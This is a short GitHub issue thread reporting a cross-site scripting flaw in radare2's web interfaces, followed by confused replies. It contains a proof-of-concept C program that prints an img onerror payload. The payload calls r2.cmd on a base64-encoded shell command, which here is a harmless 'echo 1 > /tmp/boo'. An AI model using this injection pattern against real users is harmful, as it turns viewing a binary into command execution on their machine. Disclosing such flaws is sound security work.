The enyo and material web interfaces are vulnerable to XSS
Maijin opened this issue · 4 comments
Maijin commented
Again, this leads to arbitrary command execution.
PoC
void main()
{
printf("<img src=k onerror=r2.cmd(atob('ZWNobyAxID4gL3RtcC9ib28='))></img>");
}
Edit:
To clarify, this occurs when the string from the binary is show in the disassembly window.
novia713 commented
been looking for this in the web-ui and didn't found it.
AFAIK this code is in r2, not in the webui.
if i'm wrong, please somebody tells me where is this code.
radare commented
wat
Maijin commented
I have no idea what this is about, I just ripped of the issue from radare2 repo